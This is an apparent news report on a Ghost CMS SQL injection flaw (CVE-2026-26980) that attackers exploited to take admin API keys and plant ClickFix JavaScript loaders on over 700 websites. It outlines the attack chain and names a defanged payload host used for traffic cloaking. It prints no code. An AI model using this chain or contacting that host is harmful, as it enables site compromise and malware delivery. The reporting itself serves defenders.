Critical Ghost CMS Vulnerability Exposes Over 700 Websites to Cyber Attacks
A significant vulnerability in the Ghost content management system, designated as CVE-2026-26980, has been exploited in a large-scale cyber campaign that has compromised over 700 websites. This breach includes platforms linked to prominent institutions such as Harvard University, the University of Oxford, and DuckDuckGo. Security researchers have indicated that the attacks utilized weaknesses in the Ghost CMS to inject malicious JavaScript code aimed at facilitating ClickFix malware attacks.
Ongoing Exploitation of Unpatched Systems
The attacks were investigated by the Chinese cybersecurity firm QiAnXin and its XLab research team, which has raised alarms about threat actors actively targeting unpatched installations of Ghost CMS in a “large-scale poisoning” campaign. The vulnerability was disclosed and patched in February 2026 with the release of version 6.19.1 of the Ghost CMS. This open-source platform is widely used for blogging, digital publishing, newsletters, and memberships, reportedly powering over 100,000 websites globally.
The Ghost CMS vulnerability is categorized as an SQL injection flaw affecting the platform’s Content API. Researchers from SentinelOne previously warned that this vulnerability could allow unauthenticated attackers to extract sensitive data directly from a site’s database, including authentication tokens, website content, and user credentials. The flaw has been assigned a CVSS severity score of 9.4, underscoring the serious risks associated with CVE-2026-26980. It was reportedly discovered by Anthropic using its Claude AI system.
What makes this vulnerability particularly dangerous is its potential to expose a site’s Admin API Key. Once attackers obtain this key, they can misuse Ghost’s Admin API to modify published articles and inject malicious code into legitimate websites without authorization.
Timeline of Exploitation
According to QiAnXin XLab, attackers began exploiting CVE-2026-26980 shortly after the security patch became publicly available. Investigators noted that a DLL file involved in the campaign had a compilation timestamp dated February 16, 2026—the same day the patch for the Ghost CMS vulnerability was announced. The malicious activity was first detected on May 7, 2026, and by early May, researchers had already identified hundreds of compromised websites running the Ghost CMS.
Ultimately, more than 700 websites across various industries were discovered to be affected. The victims included organizations operating in sectors such as artificial intelligence, software development, blockchain, cybersecurity, fintech, media, SaaS, and higher education. Nearly half of the compromised websites were personal blogs or independently operated sites, but many belonged to major institutions and technology-focused organizations.
QiAnXin reported that while many victims were notified about the compromises, the majority failed to respond to the alerts. Researchers indicated that at least two groups are actively conducting such poisoning operations, with some sites becoming battlegrounds for competition between the two parties, leading to different malicious code being implanted within a single day.
Mechanism of Malicious JavaScript Injection
The attackers exploited the Ghost CMS vulnerability to tamper with website articles by appending malicious JavaScript loaders to the bottom of pages. These loaders were designed to facilitate ClickFix attacks—a growing social engineering tactic that tricks users into manually executing malware on their systems. The injected code functioned as a two-stage loader that retrieved additional payloads at runtime from an external domain identified as “clo4shara[.]xyz/11z77u3.php.” This infrastructure provided attackers with the flexibility to swap payloads while maintaining the same loader framework across multiple compromised Ghost CMS sites.
QiAnXin explained that the PHP script acted as a traffic distribution and cloaking system powered by Adspect, a commercial cloaking service. The script collected browser fingerprinting data from visitors and selectively redirected targets based on predefined rules. Directly accessing clo4shara[.]xyz/11z77u3.php reveals a piece of code that functions as a typical traffic distribution script. Its core function is to gather various fingerprint information from the user’s browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions.
The cloaking mechanism enabled attackers to evade detection by ensuring that only intended victims received malicious payloads, while automated scanners and crawlers were shown harmless web content instead.
For further details on this vulnerability, refer to the original reporting source: thecyberexpress.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
